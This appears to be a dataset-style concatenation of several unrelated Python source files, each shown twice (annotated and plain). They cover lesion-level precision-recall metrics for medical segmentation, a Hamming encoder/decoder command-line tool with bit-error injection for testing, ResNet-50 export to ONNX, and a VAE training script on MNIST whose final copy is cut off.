        'hit_obj': f'{hit_prefix}_{hit_id}',
        'self_stat': self_stat,
        'self_logit': self_logit,
    }


def prc_records(segm, pred, logit):
    """Build per-connected-component records for prc analysis.

    One record is produced per ground-truth component (``is_tum=True``) and
    per predicted component (``is_tum=False``); each record links to the
    best-overlapping component on the other side via ``hit_obj``.
    """
    segm_split, segm_n_splits = label(get_pred(segm), return_num=True)
    pred_split, pred_n_splits = label(get_pred(pred), return_num=True)
    records = []
    # Ground-truth components: probability stats come from the prediction map.
    for n in range(1, segm_n_splits + 1):
        segm_cc = segm_split == n
        stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=pred_split, one_cc=segm_cc,
                                                            pred=pred[0], logit=logit[0])
        records.append(_make_record(f'tum_{n}', True, segm_cc, stats, dice, hit_id,
                                    'pred', 1., np.inf))
    # Predicted components: stats against ground truth default to 1 / +inf.
    for n in range(1, pred_n_splits + 1):
        pred_cc = pred_split == n
        stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=segm_split, one_cc=pred_cc)
        records.append(_make_record(f'pred_{n}', False, pred_cc, stats, dice, hit_id,
                                    'tum', np.max(pred[0][pred_cc]), np.max(logit[0][pred_cc])))
    return records
def exp2prc_df(exp_path, n_val=5, specific_ids=None):
    """Construct a pandas DataFrame with prc data from all predictions in ``exp_path``.

    Parameters
    ----------
    exp_path: str
        Experiment folder containing ``experiment_{n}`` sub-folders.
    n_val: int
        Number of validation folds to read (``experiment_0`` .. ``experiment_{n_val - 1}``).
    specific_ids: Container or None
        If given, only records whose case id is in this collection are kept.
    """
    dfs = []
    for n in range(n_val):
        prc_path = jp(exp_path, f'experiment_{n}', 'test_metrics', 'prc_records.json')
        prc_dicts = load_json(prc_path)
        for _id, records in prc_dicts.items():
            # Skip ids that were not requested.
            if specific_ids is not None and _id not in specific_ids:
                continue
            # Tag every record with its case id (a plain loop, not a
            # side-effect comprehension).
            for record in records:
                record['id'] = _id
            dfs.append(pd.DataFrame.from_records(records))
    return pd.concat(dfs)
def get_size_df(df, size='small'):
    """Return the rows of ``df`` for lesions of the given ``size``.

    Rows of the requested size are kept, together with every prediction row
    linked (via ``hit_obj``) to a kept target row.  ``size='total'`` returns
    ``df`` unchanged.
    """
    if size == 'total':
        return df
    target_df = df[df['is_tum']]
    pred_df = df[~df['is_tum']]
    target_size_df = target_df[target_df['size'] == size]
    pred_size_df = pred_df[pred_df['size'] == size]
    # Collect the pieces and concatenate once at the end instead of growing
    # the frame inside the loop (repeated pd.concat is quadratic).
    pieces = [target_size_df, pred_size_df]
    for index in target_size_df.index:
        _id, obj, hit_obj = target_size_df[['id', 'obj', 'hit_obj']].loc[index]
        if hit_obj:
            # Predictions whose hit_obj points back at this target object.
            pieces.append(df[(df.id == _id) & (df.hit_obj == obj)])
    return pd.concat(pieces)
def get_prc_met(df, thresholds=None, dice_th=0, hit_stat='hit_stat', self_stat='self_stat'):
    """Collect precision/recall-curve data for the mets experiments.

    For every threshold, object-level confusion counts are computed from the
    per-component records in ``df`` and summarised together with the local
    dice of the true positives.
    """
    if thresholds is None:
        thresholds = np_sigmoid(np.linspace(0, 5, num=51))

    precision, recall, total_fp, avg_dice, std_dice = [], [], [], [], []
    for th in thresholds:
        above = df[df[self_stat] >= th]
        targets = above[above['is_tum']]
        preds = above[~above['is_tum']]

        # NOTE(review): the FP count uses a strict `> th` while the
        # pre-filter above uses `>= th`, so predictions sitting exactly at
        # the threshold are excluded from FP — kept as-is, confirm intended.
        hit_mask = (targets['hit_dice'] > dice_th) & (targets[hit_stat] >= th)
        fp = len(preds[(preds['hit_dice'] <= dice_th) & (preds[self_stat] > th)])
        tp = len(targets[hit_mask])
        fn = len(targets[(targets['hit_dice'] <= dice_th) | (targets[hit_stat] < th)])
        local_dices = targets['hit_dice'][hit_mask]

        precision.append(fraction(tp, tp + fp))
        recall.append(fraction(tp, tp + fn))
        total_fp.append(fp)
        avg_dice.append(np.mean(local_dices))
        std_dice.append(np.std(local_dices))
    return {'precision': precision, 'recall': recall, 'totalFP': total_fp, 'avg_dice': avg_dice, 'std_dice': std_dice}
def evaluate_individual_metrics_with_prc(load_y_true, metrics: dict,
predictions_path, logits_path, results_path, exist_ok=False):
assert len(metrics) > 0, 'No metric provided'
os.makedirs(results_path, exist_ok=exist_ok)
results = defaultdict(dict)
for identifier, prediction in tqdm(load_from_folder(predictions_path)):
target = load_y_true(identifier)
for metric_name, metric in metrics.items():
if metric_name == 'prc_records':
logit = load_pred(identifier, logits_path)
results[metric_name][identifier] = metric(target, prediction, logit)
else:
results[metric_name][identifier] = metric(target, prediction)
for metric_name, result in results.items():
save_json(result, os.path.join(results_path, metric_name + '.json'), indent=0) | lowres/metric.py | import os
from os.path import join as jp
from collections import defaultdict
from tqdm import tqdm
import numpy as np
import pandas as pd
from skimage.measure import label
from dpipe.io import load_json, save_json, load_pred
from dpipe.medim.metrics import dice_score, fraction
from dpipe.commands import load_from_folder
from lowres.utils import get_pred, volume2diameter, np_sigmoid
def get_intersection_stat_dice_id(cc_mask, one_cc, pred=None, logit=None):
"""Returns max local dice and corresponding stat to this hit component.
If ``pred`` is ``None``, ``cc_mask`` treated as ground truth and stat sets to be 1."""
hit_components = np.unique(cc_mask[one_cc])
hit_components = hit_components[hit_components != 0]
hit_stats = dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [[], [], [], []]))
hit_dice, hit_id = [], []
for n in hit_components:
cc_mask_hit_one = cc_mask == n
hit_dice.append(dice_score(cc_mask_hit_one, one_cc))
hit_id.append(n)
hit_stats['hit_max'].append(1. if pred is None else np.max(pred[cc_mask_hit_one]))
hit_stats['hit_median'].append(1. if pred is None else np.median(pred[cc_mask_hit_one]))
hit_stats['hit_q95'].append(1. if pred is None else np.percentile(pred[cc_mask_hit_one], q=95))
hit_stats['hit_logit'].append(np.inf if logit is None else np.max(logit[cc_mask_hit_one]))
if len(hit_dice) == 0:
return dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [0., 0., 0., -np.inf])), 0., None
else:
max_idx = np.argmax(hit_dice)
hit_id = np.array(hit_id)[max_idx]
hit_stats['hit_max'] = np.array(hit_stats['hit_max'])[max_idx]
hit_stats['hit_median'] = np.array(hit_stats['hit_median'])[max_idx]
hit_stats['hit_q95'] = np.array(hit_stats['hit_q95'])[max_idx]
hit_stats['hit_logit'] = np.array(hit_stats['hit_logit'])[max_idx]
return hit_stats, np.max(hit_dice), hit_id
def prc_records(segm, pred, logit):
segm_split, segm_n_splits = label(get_pred(segm), return_num=True)
pred_split, pred_n_splits = label(get_pred(pred), return_num=True)
records = []
for n in range(1, segm_n_splits + 1):
record = {}
segm_cc = segm_split == n
record['obj'] = f'tum_{n}'
record['is_tum'] = True
record['diameter'] = volume2diameter(np.sum(segm_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=pred_split, one_cc=segm_cc,
pred=pred[0], logit=logit[0])
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'pred_{hit_id}'
record['self_stat'] = 1.
record['self_logit'] = np.inf
records.append(record)
for n in range(1, pred_n_splits + 1):
record = {}
pred_cc = pred_split == n
record['obj'] = f'pred_{n}'
record['is_tum'] = False
record['diameter'] = volume2diameter(np.sum(pred_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=segm_split, one_cc=pred_cc)
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'tum_{hit_id}'
record['self_stat'] = np.max(pred[0][pred_cc])
record['self_logit'] = np.max(logit[0][pred_cc])
records.append(record)
return records
def exp2prc_df(exp_path, n_val=5, specific_ids=None):
"""Constructs pandas DataFrame with prc data from all predictions in ``exp_path``."""
dfs = []
for n in range(n_val):
prc_path = jp(exp_path, f'experiment_{n}', 'test_metrics', 'prc_records.json')
prc_dicts = load_json(prc_path)
for _id in prc_dicts.keys():
if specific_ids is None:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
else:
if _id in specific_ids:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
df = pd.concat(dfs)
return df
def get_size_df(df, size='small'):
"""Takes rows from DataFrame with specified lesion size"""
if size == 'total':
return df
else:
target_df = df[df['is_tum']]
pred_df = df[~df['is_tum']]
target_size_df = target_df[target_df['size'] == size]
pred_size_df = pred_df[pred_df['size'] == size]
size_df = pd.concat([target_size_df, pred_size_df])
for index in target_size_df.index:
_id, obj, hit_obj = target_size_df[['id', 'obj', 'hit_obj']].loc[index]
if hit_obj:
linked_predict = df[(df.id == _id) & (df.hit_obj == obj)]
size_df = pd.concat([size_df, linked_predict])
return size_df
def get_prc_met(df, thresholds=None, dice_th=0, hit_stat='hit_stat', self_stat='self_stat'):
"""Collects necessary data for building prc for mets experiments"""
if thresholds is None:
thresholds = np_sigmoid(np.linspace(0, 5, num=51))
precision, recall, total_fp, avg_dice, std_dice = [], [], [], [], []
for th in thresholds:
conf_dict = {'tp': 0, 'fp': 0, 'fn': 0}
th_df = df[df[self_stat] >= th]
target_df = th_df[th_df['is_tum']]
pred_df = th_df[~th_df['is_tum']]
conf_dict['fp'] = len(pred_df[(pred_df['hit_dice'] <= dice_th) & (pred_df[self_stat] > th)])
conf_dict['tp'] = len(target_df[(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)])
conf_dict['fn'] = len(target_df[(target_df['hit_dice'] <= dice_th) | (target_df[hit_stat] < th)])
local_dices = target_df['hit_dice'][(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)]
precision.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fp']))
recall.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fn']))
total_fp.append(conf_dict['fp'])
avg_dice.append(np.mean(local_dices))
std_dice.append(np.std(local_dices))
return {'precision': precision, 'recall': recall, 'totalFP': total_fp, 'avg_dice': avg_dice, 'std_dice': std_dice}
def evaluate_individual_metrics_with_prc(load_y_true, metrics: dict,
predictions_path, logits_path, results_path, exist_ok=False):
assert len(metrics) > 0, 'No metric provided'
os.makedirs(results_path, exist_ok=exist_ok)
results = defaultdict(dict)
for identifier, prediction in tqdm(load_from_folder(predictions_path)):
target = load_y_true(identifier)
for metric_name, metric in metrics.items():
if metric_name == 'prc_records':
logit = load_pred(identifier, logits_path)
results[metric_name][identifier] = metric(target, prediction, logit)
else:
results[metric_name][identifier] = metric(target, prediction)
for metric_name, result in results.items():
save_json(result, os.path.join(results_path, metric_name + '.json'), indent=0) | 0.580709 | 0.163579 |
"""Module for personal hamming coder."""
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
    '''
    Build the argument parser for the hamming command line tool.

    ``-i``/``-o`` are mandatory file paths; exactly one mode flag
    (encode, decode or one of the error injectors) must be given.
    '''
    parser = argparse.ArgumentParser(description='Command line hamming coder')
    parser.add_argument("-i", "--input", required=True,
                        help="Insert path to input file.")
    parser.add_argument("-o", "--output", required=True,
                        help="Insert path to output file.")
    mode = parser.add_mutually_exclusive_group(required=True)
    # (short flag, long flag, help text) for each mutually exclusive mode.
    mode_flags = [
        ("-K", "--encode", "Swiches to encoding"),
        ("-D", "--decode", "Swiches to decoding"),
        ("-1", "--singleerror", "Injects input file with single bit errors"),
        ("-2", "--doubleerror", "Injects input file with double bit errors"),
        ("-3", "--tripleerror", "Injects input file with triple bit errors"),
        ("-R", "--randomerror", "Injects input file with random bit errors"),
    ]
    for short_flag, long_flag, help_text in mode_flags:
        mode.add_argument(short_flag, long_flag, action="store_true", help=help_text)
    return parser
def main():
    '''
    Main program handler.

    Parses the command line and dispatches to one of three modes:
    ENCODE, DECODE, or error injection.  Timing (and, for the codec
    modes, file-size) statistics are printed for every run.
    Returns 0.
    '''
    parser = setup_parser()
    args = parser.parse_args()
    inputfile = args.input
    outputfile = args.output
    # Leftover paths from manual testing, kept for reference:
    #inputfile = "input.txt"
    #outputfile = "output.hamm"
    #inputfile = "output.hamm"
    #outputfile = "input.rebulild.txt"
    ##inputfile = "output.hamm"
    ##outputfile = "output.singleerrors.hamm"
    #inputfile = "output.singleerrors.hamm"
    #outputfile = "input.rebulild.txt"
    # Banner.  NOTE: Python 2 print statements throughout this module.
    print "Welcome to Hamming code command line tool."
    print "<NAME> (jan.gabriel(at)tul.cz"
    print "========================================================"
    print "from: " + inputfile + " =====>>>>> to: " + outputfile
    if(args.encode):
        # --- ENCODE: read raw bits, hamming-encode them, write them out ---
        print "You have selected to ENCODE"
        print "========================================================"
        start_time = time.time()
        with open(inputfile, "rb") as ifile:
            buff = binpacker.readBinaryToEncode(ifile)
        output = hammcoder.hammingEncode(buff)
        with open(outputfile, "wb") as ofile:
            binpacker.writeBinaryToEncode(ofile, output)
        end_time = time.time()
        # Report the size overhead added by the parity bits.
        oldsize = os.path.getsize(inputfile)
        newsize = os.path.getsize(outputfile)
        compratio = (newsize / float(oldsize)) * 100
        insec = end_time - start_time
        print "You have succesfully ENCODED the file!"
        print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
            newsize / 1000.0, compratio) + "% increase in file size."
        print "===================In: %.5s seconds!===================" % insec
    elif(args.decode):
        # --- DECODE: hamming-decode and report any logged errors ---
        print "You have selected to DECODE"
        print "========================================================"
        start_time = time.time()
        with open(inputfile, "rb") as ifile:
            buff = binpacker.readBinaryToDecode(ifile)
        # hammingDecode returns a dict with the decoded payload ("output")
        # and a list of per-block error messages ("log").
        output = hammcoder.hammingDecode(buff)
        with open(outputfile, "wb") as ofile:
            binpacker.writeBinaryToDecode(ofile, output["output"])
        end_time = time.time()
        oldsize = os.path.getsize(inputfile)
        newsize = os.path.getsize(outputfile)
        compratio = (newsize / float(oldsize)) * 100
        insec = end_time - start_time
        if len(output["log"]) == 0:
            print "You have succesfully DECODED the file!"
        else:
            # Show every error the decoder logged.
            for log in output["log"]:
                print log
        print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
            newsize / 1000.0, compratio) + "% decrease in file size."
        print "===================In: %.5s seconds!===================" % insec
    elif(args.singleerror or args.doubleerror
            or args.tripleerror or args.randomerror):
        # --- ERROR INJECTION: flip bits so the decoder can be exercised ---
        start_time = time.time()
        with open(inputfile, "rb") as ifile:
            buff = binpacker.readBinaryToDecode(ifile)
        if(args.singleerror):
            print "You have selected to INJECT SINGLE ERRORS"
            print "========================================================"
            buff = errormaker.makeSingleError(buff)
        elif(args.doubleerror):
            print "You have selected to INJECT DOUBLE ERRORS"
            print "========================================================"
            buff = errormaker.makeDoubleError(buff)
        elif(args.tripleerror):
            print "You have selected to INJECT TRIPLE ERRORS"
            print "========================================================"
            buff = errormaker.makeTripleError(buff)
        elif(args.randomerror):
            print "You have selected to INJECT RANDOM ERRORS"
            print "========================================================"
            buff = errormaker.makeRandomError(buff)
        with open(outputfile, "wb") as ofile:
            binpacker.writeBinaryToEncode(ofile, buff)
        end_time = time.time()
        insec = end_time - start_time
        print "You have succesfully INJECTED ERRORS!"
        print "===================In: %.5s seconds!===================" % insec
    else:
        # Unreachable in practice: argparse enforces one required mode flag.
        print "Sorry, something went terribly wrong!"
    # Keep the console window open on Windows double-click runs.
    os.system("pause")
    return 0
if __name__ == "__main__":
main() | hamming-python/hamming_main.py | """Module for personal hamming coder."""
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
'''
Basic parser setup for simple hamming command line input.
'''
parser = argparse.ArgumentParser(description='Command line hamming coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
group.add_argument("-1", "--singleerror", action="store_true",
help="Injects input file with single bit errors")
group.add_argument("-2", "--doubleerror", action="store_true",
help="Injects input file with double bit errors")
group.add_argument("-3", "--tripleerror", action="store_true",
help="Injects input file with triple bit errors")
group.add_argument("-R", "--randomerror", action="store_true",
help="Injects input file with random bit errors")
return parser
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "input.txt"
#outputfile = "output.hamm"
#inputfile = "output.hamm"
#outputfile = "input.rebulild.txt"
##inputfile = "output.hamm"
##outputfile = "output.singleerrors.hamm"
#inputfile = "output.singleerrors.hamm"
#outputfile = "input.rebulild.txt"
print "Welcome to Hamming code command line tool."
print "<NAME> (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToEncode(ifile)
output = hammcoder.hammingEncode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, output)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% increase in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
output = hammcoder.hammingDecode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToDecode(ofile, output["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
if len(output["log"]) == 0:
print "You have succesfully DECODED the file!"
else:
for log in output["log"]:
print log
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% decrease in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.singleerror or args.doubleerror
or args.tripleerror or args.randomerror):
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
if(args.singleerror):
print "You have selected to INJECT SINGLE ERRORS"
print "========================================================"
buff = errormaker.makeSingleError(buff)
elif(args.doubleerror):
print "You have selected to INJECT DOUBLE ERRORS"
print "========================================================"
buff = errormaker.makeDoubleError(buff)
elif(args.tripleerror):
print "You have selected to INJECT TRIPLE ERRORS"
print "========================================================"
buff = errormaker.makeTripleError(buff)
elif(args.randomerror):
print "You have selected to INJECT RANDOM ERRORS"
print "========================================================"
buff = errormaker.makeRandomError(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, buff)
end_time = time.time()
insec = end_time - start_time
print "You have succesfully INJECTED ERRORS!"
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main() | 0.531209 | 0.152316 |
import cv2
import onnx
import torch
from albumentations import (Compose,Resize,)
from albumentations.augmentations.transforms import Normalize
from albumentations.pytorch.transforms import ToTensor
from torchvision import models
import os
def preprocess_image(img_path):
    """Read the image at ``img_path`` and turn it into a 1-image input batch.

    The image is resized to 224x224, normalised with the ImageNet channel
    statistics and converted to a tensor with a leading batch dimension.
    """
    pipeline = Compose([
        Resize(224, 224, interpolation=cv2.INTER_NEAREST),
        Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
        ToTensor(),
    ])
    image = cv2.imread(img_path)
    tensor = pipeline(image=image)["image"]
    # Add the batch axis the model expects.
    return torch.unsqueeze(tensor, 0)
def postprocess(output_data):
    """Print the human-readable top predictions from raw model logits.

    Reads the class names from ``imagenet_classes.txt`` (one per line) and
    prints classes in descending confidence order until the confidence drops
    to 0.5% or every class has been printed.
    """
    # get class names
    with open("imagenet_classes.txt") as f:
        classes = [line.strip() for line in f.readlines()]
    # calculate human-readable value by softmax (percent)
    confidences = torch.nn.functional.softmax(output_data, dim=1)[0] * 100
    # find top predicted classes
    _, indices = torch.sort(output_data, descending=True)
    # print the top classes predicted by the model; the explicit bound guards
    # against running off the end when every class clears the 0.5% cut-off
    i = 0
    while i < indices.size(1) and confidences[indices[0][i]] > 0.5:
        class_idx = indices[0][i]
        print(
            "class:",
            classes[class_idx],
            ", confidence:",
            confidences[class_idx].item(),
            "%, index:",
            class_idx.item(),
        )
        i += 1
def main():
    """Classify a sample image with ResNet-50, then export the model to ONNX.

    NOTE(review): hard-codes GPU index 6 and expects ``turkish_coffee.jpg``
    and ``imagenet_classes.txt`` in the working directory — confirm before
    running in another environment.
    """
    # load pre-trained model -------------------------------------------------------------------------------------------
    # Must be set before the first CUDA call so only device 6 is visible.
    os.environ['CUDA_VISIBLE_DEVICES'] = '6'
    model = models.resnet50(pretrained=True)
    # preprocessing stage ----------------------------------------------------------------------------------------------
    input = preprocess_image("turkish_coffee.jpg").cuda()
    # inference stage --------------------------------------------------------------------------------------------------
    model.eval()  # disable dropout, use running batch-norm statistics
    model.cuda()
    output = model(input)
    # post-processing stage --------------------------------------------------------------------------------------------
    postprocess(output)
    # convert to ONNX --------------------------------------------------------------------------------------------------
    ONNX_FILE_PATH = "resnet50.onnx"
    torch.onnx.export(model, input, ONNX_FILE_PATH, input_names=["input"], output_names=["output"], export_params=True)
    onnx_model = onnx.load(ONNX_FILE_PATH)
    # check that the model converted fine
    onnx.checker.check_model(onnx_model)
    print("Model was successfully converted to ONNX format.")
    print("It was saved to", ONNX_FILE_PATH)
if __name__ == '__main__':
main() | samples/PyTorch-ONNX-TensorRT/pytorch_model.py | import cv2
import onnx
import torch
from albumentations import (Compose,Resize,)
from albumentations.augmentations.transforms import Normalize
from albumentations.pytorch.transforms import ToTensor
from torchvision import models
import os
def preprocess_image(img_path):
# transformations for the input data
transforms = Compose([
Resize(224, 224, interpolation=cv2.INTER_NEAREST),
Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensor(),
])
# read input image
input_img = cv2.imread(img_path)
# do transformations
input_data = transforms(image=input_img)["image"]
# prepare batch
batch_data = torch.unsqueeze(input_data, 0)
return batch_data
def postprocess(output_data):
# get class names
with open("imagenet_classes.txt") as f:
classes = [line.strip() for line in f.readlines()]
# calculate human-readable value by softmax
confidences = torch.nn.functional.softmax(output_data, dim=1)[0] * 100
# find top predicted classes
_, indices = torch.sort(output_data, descending=True)
i = 0
# print the top classes predicted by the model
while confidences[indices[0][i]] > 0.5:
class_idx = indices[0][i]
print(
"class:",
classes[class_idx],
", confidence:",
confidences[class_idx].item(),
"%, index:",
class_idx.item(),
)
i += 1
def main():
# load pre-trained model -------------------------------------------------------------------------------------------
os.environ['CUDA_VISIBLE_DEVICES'] = '6'
model = models.resnet50(pretrained=True)
# preprocessing stage ----------------------------------------------------------------------------------------------
input = preprocess_image("turkish_coffee.jpg").cuda()
# inference stage --------------------------------------------------------------------------------------------------
model.eval()
model.cuda()
output = model(input)
# post-processing stage --------------------------------------------------------------------------------------------
postprocess(output)
# convert to ONNX --------------------------------------------------------------------------------------------------
ONNX_FILE_PATH = "resnet50.onnx"
torch.onnx.export(model, input, ONNX_FILE_PATH, input_names=["input"], output_names=["output"], export_params=True)
onnx_model = onnx.load(ONNX_FILE_PATH)
# check that the model converted fine
onnx.checker.check_model(onnx_model)
print("Model was successfully converted to ONNX format.")
print("It was saved to", ONNX_FILE_PATH)
if __name__ == '__main__':
main() | 0.463201 | 0.375163 |
import os
import fire
import numpy as np
import torch
from torch import optim
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from libs.Visualize import Visualize
from models.VAE import VAE
class Main():
    """Training driver: wires together MNIST loading, the VAE, optimisation,
    early stopping and the final visualisations."""
    def __init__(self, z_dim):
        """Constructor

        Args:
            z_dim (int): Dimensions of the latent variable.

        Returns:
            None.
        """
        self.z_dim = z_dim
        # Filled in later by createDataLoader().
        self.dataloader_train = None
        self.dataloader_valid = None
        self.dataloader_test = None
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.model = VAE(self.z_dim).to(self.device)
        self.writer = SummaryWriter(log_dir="./logs")
        self.lr = 0.001
        self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
        self.num_max_epochs = 1000
        self.num_no_improved = 0  # consecutive epochs without validation improvement
        self.num_batch_train = 0  # running train-batch counter (TensorBoard x-axis)
        self.num_batch_valid = 0  # running valid-batch counter (TensorBoard x-axis)
        self.loss_valid = 10 ** 7  # Initialize with a large value
        self.loss_valid_min = 10 ** 7  # Initialize with a large value
        # NOTE(review): dataloader_test is still None here; it is patched
        # onto the Visualize instance in createDataLoader().
        self.Visualize = Visualize(self.z_dim, self.dataloader_test, self.model, self.device)

    def createDirectories(self):
        """Create directories for the tensorboard and learned model

        Args:
            None.

        Returns:
            None.
        """
        if not os.path.exists("./logs"):
            os.makedirs("./logs")
        if not os.path.exists("./params"):
            os.makedirs("./params")

    def createDataLoader(self):
        """Download MNIST and convert it to data loaders

        Args:
            None.

        Returns:
            None.
        """
        transform = transforms.Compose([transforms.ToTensor(), transforms.Lambda(lambda x: x.view(-1))])  # Preprocessing for MNIST images: tensor + flatten to a vector
        dataset_train_valid = datasets.MNIST("./", train=True, download=True, transform=transform)  # Separate train data and test data to get a dataset
        dataset_test = datasets.MNIST("./", train=False, download=True, transform=transform)
        # Use 20% of train data as validation data
        size_train_valid = len(dataset_train_valid)  # 60000
        size_train = int(size_train_valid * 0.8)  # 48000
        size_valid = size_train_valid - size_train  # 12000
        dataset_train, dataset_valid = torch.utils.data.random_split(dataset_train_valid, [size_train, size_valid])
        # Create dataloaders from the datasets
        self.dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1000, shuffle=True)
        self.dataloader_valid = torch.utils.data.DataLoader(dataset_valid, batch_size=1000, shuffle=False)
        self.dataloader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1000, shuffle=False)
        # Hand the freshly created test loader to the visualiser.
        self.Visualize.dataloader_test = self.dataloader_test

    def train_batch(self):
        """Batch-based learning for training data

        Args:
            None.

        Returns:
            None.
        """
        self.model.train()
        for x, _ in self.dataloader_train:
            # lower_bound holds the (KL, reconstruction) ELBO terms;
            # the training loss is the negated sum.
            lower_bound, _, _ = self.model(x, self.device)
            loss = -sum(lower_bound)
            self.model.zero_grad()
            loss.backward()
            self.optimizer.step()
            # NOTE(review): self.num_iter is assigned by main()'s epoch loop
            # before this method runs; calling train_batch() standalone would
            # fail on the missing attribute.
            self.writer.add_scalar("Loss_train/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
            self.writer.add_scalar("Loss_train/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
            self.num_batch_train += 1
        # NOTE(review): rolls the counter back by one after each epoch, so
        # consecutive epochs overlap by one step on the TensorBoard x-axis —
        # confirm this is intended.
        self.num_batch_train -= 1

    def valid_batch(self):
        """Batch-based learning for validating data

        Args:
            None.

        Returns:
            None.
        """
        loss = []
        self.model.eval()
        for x, _ in self.dataloader_valid:
            lower_bound, _, _ = self.model(x, self.device)
            loss.append(-sum(lower_bound).cpu().detach().numpy())
            self.writer.add_scalar("Loss_valid/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
            self.writer.add_scalar("Loss_valid/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
            self.num_batch_valid += 1
        # NOTE(review): same off-by-one rollback as in train_batch().
        self.num_batch_valid -= 1
        self.loss_valid = np.mean(loss)
        # Track the best (lowest) validation loss seen so far.
        self.loss_valid_min = np.minimum(self.loss_valid_min, self.loss_valid)

    def early_stopping(self):
        """Judging early stopping

        Args:
            None.

        Returns:
            None.
        """
        if self.loss_valid_min < self.loss_valid:  # If the loss of this iteration is greater than the minimum loss of the previous iterations, the counter variable is incremented.
            self.num_no_improved += 1
            print(f"Validation got worse for the {self.num_no_improved} time in a row.")
        else:  # If the loss of this iteration is the same or smaller than the minimum loss of the previous iterations, reset the counter variable and save parameters.
            self.num_no_improved = 0
            torch.save(self.model.state_dict(), f"./params/model_z_{self.z_dim}.pth")

    def main(self):
        """Train with early stopping, then reload the best weights and visualise."""
        self.createDirectories()
        self.createDataLoader()
        print("-----Start training-----")
        for self.num_iter in range(self.num_max_epochs):
            self.train_batch()
            self.valid_batch()
            print(f"[EPOCH{self.num_iter + 1}] loss_valid: {int(self.loss_valid)} | Loss_valid_min: {int(self.loss_valid_min)}")
            self.early_stopping()
            # Stop after 10 epochs in a row without improvement.
            if self.num_no_improved >= 10:
                print("Apply early stopping")
                break
        self.writer.close()
        print("-----Stop training-----")
        print("-----Start Visualization-----")
        # Reload the best checkpoint saved by early_stopping().
        self.model.load_state_dict(torch.load(f"./params/model_z_{self.z_dim}.pth"))
        self.model.eval()
        self.Visualize.createDirectories()
        self.Visualize.reconstruction()
        self.Visualize.latent_space()
        self.Visualize.lattice_point()
        self.Visualize.walkthrough()
        print("-----Stop Visualization-----")
if __name__ == '__main__':
fire.Fire(Main) | main.py | import os
import fire
import numpy as np
import torch
from torch import optim
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from libs.Visualize import Visualize
from models.VAE import VAE
class Main():
    """Command-line driver (via ``fire.Fire(Main)``): trains a VAE on MNIST
    with early stopping, then runs the visualization suite on the best model.
    """

    def __init__(self, z_dim):
        """Constructor
        Args:
